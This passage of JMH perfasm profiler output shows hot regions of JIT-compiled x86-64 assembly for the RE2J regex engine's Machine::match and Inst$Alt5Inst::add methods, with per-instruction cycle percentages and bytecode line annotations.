│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.07% 0.06% │││ │ │││ │ │ ││ 0x00007eff1123e9fa: test %r9d,%r9d
│││ │ │││ │ │ ││ 0x00007eff1123e9fd: jl 0x00007eff1123f1a5 ;*iflt
│││ │ │││ │ │ ││ ; - java.lang.String::charAt@1 (line 657)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.15% 0.26% │││ │ │││ │ │ ││ 0x00007eff1123ea03: mov 0xc(%rbx),%edi ;*getfield value
│││ │ │││ │ │ ││ ; - java.lang.String::charAt@6 (line 657)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.18% 0.22% │││ │ │││ │ │ ││ 0x00007eff1123ea06: mov 0xc(%r12,%rdi,8),%ebp ;*arraylength
│││ │ │││ │ │ ││ ; - java.lang.String::charAt@9 (line 657)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
│││ │ │││ │ │ ││ ; implicit exception: dispatches to 0x00007eff1123fd51
2.42% 2.42% │││ │ │││ │ │ ││ 0x00007eff1123ea0b: cmp %ebp,%r9d
│││ │ │││ │ │ ││ 0x00007eff1123ea0e: jge 0x00007eff1123f2b9 ;*if_icmplt
│││ │ │││ │ │ ││ ; - java.lang.String::charAt@10 (line 657)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.69% 0.67% │││ │ │││ │ │ ││ 0x00007eff1123ea14: cmp %ebp,%r9d
│││ │ │││ │ │ ││ 0x00007eff1123ea17: jae 0x00007eff1123f001
0.10% 0.08% │││ │ │││ │ │ ││ 0x00007eff1123ea1d: lea (%r12,%rdi,8),%r11
0.01% 0.02% │││ │ │││ │ │ ││ 0x00007eff1123ea21: movzwl 0x10(%r11,%r9,2),%ecx ;*caload
│││ │ │││ │ │ ││ ; - java.lang.String::charAt@27 (line 660)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@2 (line 4866)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.07% 0.11% │││ │ │││ │ │ ││ 0x00007eff1123ea27: cmp $0xd800,%ecx
│││ │ │││ │ │ ││ 0x00007eff1123ea2d: jge 0x00007eff1123f305 ;*if_icmplt
│││ │ │││ │ │ ││ ; - java.lang.Character::isHighSurrogate@3 (line 4729)
│││ │ │││ │ │ ││ ; - java.lang.Character::codePointAt@9 (line 4867)
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@20 (line 187)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.57% 0.67% │││ │ │││ │ │ ││ 0x00007eff1123ea33: shl $0x3,%ecx ;*ishl
│││ │ │││ │ │ ││ ; - com.google.re2j.MachineInput$UTF16Input::step@38 (line 190)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.14% 0.11% │││ │ │││ │ │ ││ 0x00007eff1123ea36: mov %ecx,%ebx
0.01% 0.01% │││ │ │││ │ │ ││ 0x00007eff1123ea38: and $0x7,%ebx
0.62% 0.57% │││ │ │││ │ │ ││ 0x00007eff1123ea3b: or $0x1,%ecx
0.03% 0.07% │││ │ │││ │ │ ││ 0x00007eff1123ea3e: or $0x1,%ebx ;*ior ; - com.google.re2j.MachineInput$UTF16Input::step@41 (line 190)
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@411 (line 259)
0.62% 0.56% │││ │ │││ │ │ ││ 0x00007eff1123ea41: sar $0x3,%ecx ; OopMap{[16]=Oop [80]=Oop [96]=Oop [112]=Oop off=1348}
│││ │ │││ │ │ ││ ;*goto
│││ │ │││ │ │ ││ ; - com.google.re2j.Machine::match@441 (line 266)
0.00% 0.01% │││ │ │││ │ │ ││ ↗↗ 0x00007eff1123ea44: test %eax,0x170fe5b6(%rip) # 0x00007eff2833d000
│││ │ │││ │ │ ││ ││ ;*goto
│││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@441 (line 266)
│││ │ │││ │ │ ││ ││ ; {poll}
0.02% 0.02% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea4a: mov 0x60(%rsp),%r11
0.03% 0.02% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea4f: mov 0x14(%r11),%r11d ;*getfield re2
│││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@169 (line 220)
0.68% 0.46% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea53: vmovd %r11d,%xmm2
0.02% 0.03% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea58: mov 0x60(%rsp),%r11
0.01% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea5d: mov 0x28(%r11),%edx ;*getfield matchcap
│││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@307 (line 243)
0.06% 0.03% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea61: mov 0x50(%rsp),%r11
0.69% 0.33% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea66: shr $0x3,%r11
0.01% 0.01% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea6a: mov %r11d,0x2c(%rsp)
0.01% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea6f: mov 0x34(%rsp),%r9d
0.03% 0.03% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea74: mov %r9d,0x20(%rsp)
0.57% 0.24% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea79: mov %r8d,0x3c(%rsp)
0.02% 0.01% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea7e: mov %ebx,0x34(%rsp)
0.01% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea82: mov %ecx,0x28(%rsp)
0.06% 0.04% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea86: mov 0x10(%rsp),%r11
0.53% 0.34% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea8b: mov %r11,0x50(%rsp)
0.02% 0.02% │││ │ │││ │ │ ││ ││ 0x00007eff1123ea90: vmovd %edx,%xmm3 ;*aload
│││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@136 (line 211)
↘││ │ │││ │ │ ││ ││ 0x00007eff1123ea94: mov 0x2c(%rsp),%r11d
0.06% 0.05% ││ │ │││ │ │ ││ ││ 0x00007eff1123ea99: movzbl 0x18(%r12,%r11,8),%r8d ; implicit exception: dispatches to 0x00007eff1123fced
0.64% 0.48% ││ │ │││ │ │ ││ ││ 0x00007eff1123ea9f: test %r8d,%r8d
││ │ │││╭│ │ ││ ││ 0x00007eff1123eaa2: je 0x00007eff1123ead6 ;*ifeq
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@141 (line 211)
0.03% 0.01% ││ │ │││││ │ ││ ││ 0x00007eff1123eaa4: mov 0x38(%rsp),%r8d
0.01% ││ │ │││││ │ ││ ││ 0x00007eff1123eaa9: test %r8d,%r8d
││ │ │││││ │ ││ ││ 0x00007eff1123eaac: jne 0x00007eff1123f399 ;*ifeq
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@148 (line 212)
0.02% 0.00% ││ │ │││││ │ ││ ││ 0x00007eff1123eab2: test %eax,%eax
││ │ │││││ │ ││ ││ 0x00007eff1123eab4: jne 0x00007eff1123f3e5 ;*ifeq
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@162 (line 216)
0.52% 0.34% ││ │ │││││ │ ││ ││ 0x00007eff1123eaba: vmovd %xmm2,%r11d
0.00% 0.01% ││ │ │││││ │ ││ ││ 0x00007eff1123eabf: mov 0x24(%r12,%r11,8),%r11d ;*getfield prefix
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@172 (line 220)
││ │ │││││ │ ││ ││ ; implicit exception: dispatches to 0x00007eff1123fd61
││ │ │││││ │ ││ ││ 0x00007eff1123eac4: mov 0xc(%r12,%r11,8),%r8d ;*getfield value
││ │ │││││ │ ││ ││ ; - java.lang.String::isEmpty@1 (line 635)
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@175 (line 220)
││ │ │││││ │ ││ ││ ; implicit exception: dispatches to 0x00007eff1123fd71
0.02% 0.05% ││ │ │││││ │ ││ ││ 0x00007eff1123eac9: mov 0xc(%r12,%r8,8),%ebp ;*arraylength
││ │ │││││ │ ││ ││ ; - java.lang.String::isEmpty@4 (line 635)
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@175 (line 220)
││ │ │││││ │ ││ ││ ; implicit exception: dispatches to 0x00007eff1123fd81
0.90% 1.00% ││ │ │││││ │ ││ ││ 0x00007eff1123eace: test %ebp,%ebp
││ │ │││││ │ ││ ││ 0x00007eff1123ead0: jne 0x00007eff1123f351 ;*iload_3
││ │ │││││ │ ││ ││ ; - com.google.re2j.Machine::match@267 (line 237)
0.20% 0.33% ││ │ │││↘│ │ ││ ││ 0x00007eff1123ead6: test %eax,%eax
││ │ │││ │ │ ││ ││ 0x00007eff1123ead8: jne 0x00007eff1123f111 ;*ifne
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@279 (line 237)
0.00% ││ │ │││ │ │ ││ ││ 0x00007eff1123eade: mov 0x60(%rsp),%r11
0.06% 0.04% ││ │ │││ │ │ ││ ││ 0x00007eff1123eae3: movzbl 0x11(%r11),%r9d ;*getfield captures
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@283 (line 240)
0.41% 0.24% ││ │ │││ │ │ ││ ││ 0x00007eff1123eae8: test %r9d,%r9d
││ │ │││ │ │ ││ ││ 0x00007eff1123eaeb: jne 0x00007eff1123f1f1 ;*ifeq
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@286 (line 240)
0.23% 0.25% ││ │ │││ │ │ ││ ││ 0x00007eff1123eaf1: mov 0x18(%r11),%r8d ;*getfield prog
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@297 (line 243)
0.00% ││ │ │││ │ │ ││ ││ 0x00007eff1123eaf5: mov 0x1c(%r12,%r8,8),%ebp ;*getfield startInst
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@300 (line 243)
││ │ │││ │ │ ││ ││ ; implicit exception: dispatches to 0x00007eff1123fcfd
0.02% 0.02% ││ │ │││ │ │ ││ ││ 0x00007eff1123eafa: mov 0x8(%r12,%rbp,8),%r11d ; implicit exception: dispatches to 0x00007eff1123fd0d
0.46% 0.37% ││ │ │││ │ │ ││ ││ 0x00007eff1123eaff: cmp $0xf8019a09,%r11d ; {metadata('com/google/re2j/Inst$Alt5Inst')}
││ │ │││ │ │ ││ ││ 0x00007eff1123eb06: jne 0x00007eff1123efa5 ;*ifeq
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@286 (line 240)
0.33% 0.13% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb0c: lea (%r12,%rbp,8),%rsi ;*invokevirtual add
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@318 (line 243)
││ │ │││ │ │ ││ ││ 0x00007eff1123eb10: mov 0x2c(%rsp),%r11d
0.05% 0.02% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb15: shl $0x3,%r11 ;*aload
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@136 (line 211)
0.32% 0.11% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb19: mov %r11,0x10(%rsp)
0.34% 0.07% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb1e: vmovd %xmm3,%r8d
0.00% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb23: shl $0x3,%r8 ;*getfield matchcap
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@307 (line 243)
0.04% 0.04% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb27: mov %r11,%rdx
0.35% 0.09% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb2a: mov 0x3c(%rsp),%ecx
0.30% 0.16% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb2e: xor %edi,%edi
││ │ │││ │ │ ││ ││ 0x00007eff1123eb30: mov 0x60(%rsp),%r11
0.02% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb35: mov %r11,(%rsp)
0.35% 0.07% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb39: mov %r9d,0x8(%rsp)
0.30% 0.35% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb3e: mov %r10d,%r9d
││ │ │││ │ │ ││ ││ 0x00007eff1123eb41: xchg %ax,%ax
0.01% 0.00% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb43: callq 0x00007eff11046020 ; OopMap{[16]=Oop [44]=NarrowOop [80]=Oop [96]=Oop [112]=Oop off=1608}
││ │ │││ │ │ ││ ││ ;*invokevirtual add
││ │ │││ │ │ ││ ││ ; - com.google.re2j.Machine::match@318 (line 243)
││ │ │││ │ │ ││ ││ ; {optimized virtual_call}
0.17% 0.27% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb48: mov 0x24(%rsp),%edx
0.10% 0.09% ││ │ │││ │ │ ││ ││ 0x00007eff1123eb4c: test %edx,%edx
││ │ │││ ╰ │ ││ ││ 0x00007eff1123eb4e: jl 0x00007eff1123e740 ;*ifge
││ │ │││ │ ││ ││ ; - com.google.re2j.Utils::emptyOpContext@3 (line 173)
││ │ │││ │ ││ ││ ; - com.google.re2j.Machine::match@326 (line 245)
0.47% 0.40% ││ │ │││ │ ││ ││ 0x00007eff1123eb54: xor %r10d,%r10d ;*iload_0
││ │ │││ │ ││ ││ ; - com.google.re2j.Utils::emptyOpContext@10 (line 176)
││ │ │││ │ ││ ││ ; - com.google.re2j.Machine::match@326 (line 245)
0.24% 0.26% │↘ │ │││ │ ││ ││ 0x00007eff1123eb57: cmp $0xa,%edx
│ │ │││ ╭│ ││ ││ 0x00007eff1123eb5a: je 0x00007eff1123ec37 ;*iload_1
│ │ │││ ││ ││ ││ ; - com.google.re2j.Utils::emptyOpContext@20 (line 179)
│ │ │││ ││ ││ ││ ; - com.google.re2j.Machine::match@326 (line 245)
0.04% 0.03% │ │ │││ ││ ││ ││↗ 0x00007eff1123eb60: mov 0x28(%rsp),%r13d
0.06% 0.02% │ │ │││ ││ ││ │││ 0x00007eff1123eb65: test %r13d,%r13d
│ │ │││ │╰ ││ │││ 0x00007eff1123eb68: jl 0x00007eff1123e737 ;*iload_1
│ │ │││ │ ││ │││ ; - com.google.re2j.Utils::emptyOpContext@29 (line 182)
│ │ │││ │ ││ │││ ; - com.google.re2j.Machine::match@326 (line 245)
0.37% 0.44% ↘ │ │││ │ ││ │││ 0x00007eff1123eb6e: cmp $0xa,%r13d
│ │││ │ ╭ ││ │││ 0x00007eff1123eb72: je 0x00007eff1123ec40 ;*iload_0
│ │││ │ │ ││ │││ ; - com.google.re2j.Utils::emptyOpContext@39 (line 185)
│ │││ │ │ ││ │││ ; - com.google.re2j.Machine::match@326 (line 245)
0.18% 0.22% │ │││ │ │ ││ │││↗ 0x00007eff1123eb78: mov 0x24(%rsp),%r11d
0.03% 0.03% │ │││ │ │ ││ ││││ 0x00007eff1123eb7d: add $0xffffffbf,%r11d
0.03% 0.07% │ │││ │ │ ││ ││││ 0x00007eff1123eb81: cmp $0x1a,%r11d
│ │││ │ │╭ ││ ││││ 0x00007eff1123eb85: jb 0x00007eff1123eb9a ;*if_icmple
│ │││ │ ││ ││ ││││ ; - com.google.re2j.Utils::isWordRune@9 (line 149)
│ │││ │ ││ ││ ││││ ; - com.google.re2j.Utils::emptyOpContext@40 (line 185)
│ │││ │ ││ ││ ││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.43% 0.43% │ │││ │ ││ ││ ││││ 0x00007eff1123eb87: mov 0x24(%rsp),%r8d
0.19% 0.18% │ │││ │ ││ ││ ││││ 0x00007eff1123eb8c: add $0xffffff9f,%r8d
0.03% 0.02% │ │││ │ ││ ││ ││││ 0x00007eff1123eb90: cmp $0x1a,%r8d
│ │││ │ ││╭ ││ ││││ 0x00007eff1123eb94: jae 0x00007eff1123ec49 ;*iconst_1
│ │││ │ │││ ││ ││││ ; - com.google.re2j.Utils::isWordRune@42 (line 149)
│ │││ │ │││ ││ ││││ ; - com.google.re2j.Utils::emptyOpContext@40 (line 185)
│ │││ │ │││ ││ ││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.05% 0.07% │ │││ │ │↘│ ││ ││││↗ 0x00007eff1123eb9a: mov $0x1,%ebp ;*ireturn
│ │││ │ │ │ ││ │││││ ; - com.google.re2j.Utils::isWordRune@47 (line 149)
│ │││ │ │ │ ││ │││││ ; - com.google.re2j.Utils::emptyOpContext@40 (line 185)
│ │││ │ │ │ ││ │││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.33% 0.44% │ │││ │ │ │ ││ │││││↗ 0x00007eff1123eb9f: mov 0x28(%rsp),%r11d
0.19% 0.21% │ │││ │ │ │ ││ ││││││ 0x00007eff1123eba4: add $0xffffffbf,%r11d
0.10% 0.07% │ │││ │ │ │ ││ ││││││ 0x00007eff1123eba8: cmp $0x1a,%r11d
│ │││ │ │ │╭ ││ ││││││ 0x00007eff1123ebac: jb 0x00007eff1123ebc1 ;*if_icmple
│ │││ │ │ ││ ││ ││││││ ; - com.google.re2j.Utils::isWordRune@9 (line 149)
│ │││ │ │ ││ ││ ││││││ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ │││ │ │ ││ ││ ││││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.09% 0.07% │ │││ │ │ ││ ││ ││││││ 0x00007eff1123ebae: mov 0x28(%rsp),%r8d
0.35% 0.53% │ │││ │ │ ││ ││ ││││││ 0x00007eff1123ebb3: add $0xffffff9f,%r8d
0.19% 0.22% │ │││ │ │ ││ ││ ││││││ 0x00007eff1123ebb7: cmp $0x1a,%r8d
│ │││ │ │ ││╭││ ││││││ 0x00007eff1123ebbb: jae 0x00007eff1123ec72 ;*iconst_1
│ │││ │ │ │││││ ││││││ ; - com.google.re2j.Utils::isWordRune@42 (line 149)
│ │││ │ │ │││││ ││││││ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ │││ │ │ │││││ ││││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.11% 0.13% │ │││ │ │ │↘│││ ││││││↗ 0x00007eff1123ebc1: mov $0x1,%r11d ;*ireturn
│ │││ │ │ │ │││ │││││││ ; - com.google.re2j.Utils::isWordRune@47 (line 149)
│ │││ │ │ │ │││ │││││││ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ │││ │ │ │ │││ │││││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.16% 0.21% │ │││ │ │ │ │││ │││││││↗ 0x00007eff1123ebc7: cmp %r11d,%ebp
│ │││ │ │ │ │╰│ ││││││││ 0x00007eff1123ebca: je 0x00007eff1123e82b ;*if_icmpeq
│ │││ │ │ │ │ │ ││││││││ ; - com.google.re2j.Utils::emptyOpContext@47 (line 185)
│ │││ │ │ │ │ │ ││││││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.06% 0.07% │ │││ │ │ │ │ │ ││││││││ 0x00007eff1123ebd0: or $0x10,%r10d ;*ior ; - com.google.re2j.Utils::emptyOpContext@53 (line 186)
│ │││ │ │ │ │ │ ││││││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.01% 0.02% │ │││ │ │ │ │ ╰ ││││││││ 0x00007eff1123ebd4: jmpq 0x00007eff1123e82f
0.01% 0.01% │ ↘││ │ │ │ │ ││││││││ 0x00007eff1123ebd9: test %ebp,%ebp
│ ││ │ │ │ │ ││││││││ 0x00007eff1123ebdb: jne 0x00007eff1123fa99 ;*ifeq
│ ││ │ │ │ │ ││││││││ ; - com.google.re2j.Machine::freeQueue@4 (line 150)
│ ││ │ │ │ │ ││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ ││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
0.00% │ ││ │ │ │ │ ││││││││ 0x00007eff1123ebe1: mov 0x50(%rsp),%r10
0.00% │ ││ │ │ │ │ ││││││││ 0x00007eff1123ebe6: movzbl 0x18(%r10),%r11d ; implicit exception: dispatches to 0x00007eff1123fe31
0.00% │ ││ │ │ │ │ ││││││││ 0x00007eff1123ebeb: test %r11d,%r11d
│ ││ │ │ │ │ ╭││││││││ 0x00007eff1123ebee: jne 0x00007eff1123ec09 ;*ifeq
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine$Queue::clear@4 (line 69)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@26 (line 156)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ebf0: mov 0x1c(%r10),%ebp ;*getfield pcs
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine$Queue::clear@29 (line 73)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@26 (line 156)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ebf4: movb $0x1,0x18(%r10) ;*putfield empty
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine$Queue::clear@15 (line 71)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@26 (line 156)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ebf9: mov %r12,0x10(%r10) ;*putfield pcsl
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine$Queue::clear@25 (line 72)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@26 (line 156)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ebfd: mov %r12d,0xc(%r10) ;*putfield size
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine$Queue::clear@10 (line 70)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@26 (line 156)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::freeQueue@3 (line 146)
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@447 (line 267)
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ec01: test %ebp,%ebp
│ ││ │ │ │ │ │││││││││ 0x00007eff1123ec03: jne 0x00007eff1123fb45 ;*if_icmpne
│ ││ │ │ │ │ │││││││││ ; - com.google.re2j.Machine::match@12 (line 183)
0.00% │ ││ │ │ │ │ ↘││││││││ 0x00007eff1123ec09: add $0xb0,%rsp
0.00% │ ││ │ │ │ │ ││││││││ 0x00007eff1123ec10: pop %rbp
│ ││ │ │ │ │ ││││││││ 0x00007eff1123ec11: test %eax,0x170fe3e9(%rip) # 0x00007eff2833d000
│ ││ │ │ │ │ ││││││││ ; {poll_return}
0.00% 0.01% │ ││ │ │ │ │ ││││││││ 0x00007eff1123ec17: retq
0.00% 0.01% │ ↘│ │ │ │ │ ││││││││ 0x00007eff1123ec18: mov %r13d,0x24(%rsp)
0.00% │ │ │ │ │ │ ││││││││ 0x00007eff1123ec1d: mov 0x34(%rsp),%ebx
0.00% │ │ │ │ │ │ ││││││││ 0x00007eff1123ec21: mov $0xffffffff,%ecx
│ │ │ │ │ │ ╰│││││││ 0x00007eff1123ec26: jmpq 0x00007eff1123ea44
0.02% 0.01% │ ↘ │ │ │ │ │││││││ 0x00007eff1123ec2b: mov $0xffffffff,%ecx
0.01% │ │ │ │ │ │││││││ 0x00007eff1123ec30: xor %ebx,%ebx
│ │ │ │ │ ╰││││││ 0x00007eff1123ec32: jmpq 0x00007eff1123ea44
│ ↘ │ │ │ ││││││ 0x00007eff1123ec37: or $0x1,%r10d ;*ior ; - com.google.re2j.Utils::emptyOpContext@18 (line 177)
│ │ │ │ ││││││ ; - com.google.re2j.Machine::match@326 (line 245)
│ │ │ │ ╰│││││ 0x00007eff1123ec3b: jmpq 0x00007eff1123eb60
│ ↘ │ │ │││││ 0x00007eff1123ec40: or $0x2,%r10d ;*ior ; - com.google.re2j.Utils::emptyOpContext@37 (line 183)
│ │ │ │││││ ; - com.google.re2j.Machine::match@326 (line 245)
0.00% │ │ │ ╰││││ 0x00007eff1123ec44: jmpq 0x00007eff1123eb78
0.01% 0.01% │ ↘ │ ││││ 0x00007eff1123ec49: mov 0x24(%rsp),%r11d
0.09% 0.12% │ │ ││││ 0x00007eff1123ec4e: add $0xffffffd0,%r11d
0.03% 0.05% │ │ ││││ 0x00007eff1123ec52: cmp $0xa,%r11d
│ │ ╰│││ 0x00007eff1123ec56: jb 0x00007eff1123eb9a ;*if_icmple
│ │ │││ ; - com.google.re2j.Utils::isWordRune@33 (line 149)
│ │ │││ ; - com.google.re2j.Utils::emptyOpContext@40 (line 185)
│ │ │││ ; - com.google.re2j.Machine::match@326 (line 245)
0.01% 0.00% │ │ │││ 0x00007eff1123ec5c: mov 0x24(%rsp),%r11d
0.02% 0.01% │ │ │││ 0x00007eff1123ec61: cmp $0x5f,%r11d
│ │ │││ 0x00007eff1123ec65: je 0x00007eff1123fc0d ;*if_icmpne
│ │ │││ ; - com.google.re2j.Utils::isWordRune@39 (line 149)
│ │ │││ ; - com.google.re2j.Utils::emptyOpContext@40 (line 185)
│ │ │││ ; - com.google.re2j.Machine::match@326 (line 245)
0.07% 0.12% │ │ │││ 0x00007eff1123ec6b: xor %ebp,%ebp
0.02% 0.01% │ │ ╰││ 0x00007eff1123ec6d: jmpq 0x00007eff1123eb9f
0.06% 0.08% │ ↘ ││ 0x00007eff1123ec72: mov 0x28(%rsp),%r11d
0.18% 0.17% │ ││ 0x00007eff1123ec77: add $0xffffffd0,%r11d
0.06% 0.08% │ ││ 0x00007eff1123ec7b: cmp $0xa,%r11d
│ ╰│ 0x00007eff1123ec7f: jb 0x00007eff1123ebc1 ;*if_icmple
│ │ ; - com.google.re2j.Utils::isWordRune@33 (line 149)
│ │ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ │ ; - com.google.re2j.Machine::match@326 (line 245)
0.05% 0.04% │ │ 0x00007eff1123ec85: cmp $0x5f,%r13d
│ │ 0x00007eff1123ec89: je 0x00007eff1123fc49 ;*if_icmpne
│ │ ; - com.google.re2j.Utils::isWordRune@39 (line 149)
│ │ ; - com.google.re2j.Utils::emptyOpContext@44 (line 185)
│ │ ; - com.google.re2j.Machine::match@326 (line 245)
0.02% 0.01% │ │ 0x00007eff1123ec8f: xor %r11d,%r11d
0.03% │ ╰ 0x00007eff1123ec92: jmpq 0x00007eff1123ebc7
↘ 0x00007eff1123ec97: mov 0x60(%rsp),%r9
0x00007eff1123ec9c: movb $0x1,0x10(%r9) ;*putfield matched
; - com.google.re2j.Machine::step@171 (line 309)
; - com.google.re2j.Machine::match@359 (line 246)
0x00007eff1123eca1: test %r14d,%r14d
0x00007eff1123eca4: jne 0x00007eff1123fb55 ;*ifne
; - com.google.re2j.Machine::step@176 (line 310)
; - com.google.re2j.Machine::match@359 (line 246)
0x00007eff1123ecaa: mov 0x2c(%rsp),%r11d
0x00007eff1123ecaf: movzbl 0x18(%r12,%r11,8),%r9d
....................................................................................................
59.93% 61.05% <total for region 1>
....[Hottest Region 2]..............................................................................
C2, level 4, com.google.re2j.Inst$Alt5Inst::add, version 508 (839 bytes)
# parm5: [sp+0x80] = 'com/google/re2j/Machine' (sp of caller)
# parm6: [sp+0x88] = boolean
0x00007eff1121fc80: mov 0x8(%rsi),%r10d
0x00007eff1121fc84: shl $0x3,%r10
0x00007eff1121fc88: cmp %r10,%rax
0x00007eff1121fc8b: jne 0x00007eff11045e20 ; {runtime_call}
0x00007eff1121fc91: data16 xchg %ax,%ax
0x00007eff1121fc94: nopl 0x0(%rax,%rax,1)
0x00007eff1121fc9c: data16 data16 xchg %ax,%ax
[Verified Entry Point]
0.68% 0.38% 0x00007eff1121fca0: mov %eax,-0x14000(%rsp)
0.04% 0.01% 0x00007eff1121fca7: push %rbp
0.35% 0.24% 0x00007eff1121fca8: sub $0x70,%rsp ;*synchronization entry
; - com.google.re2j.Inst$Alt5Inst::add@-1 (line 260)
0.36% 0.22% 0x00007eff1121fcac: vmovq %r8,%xmm5
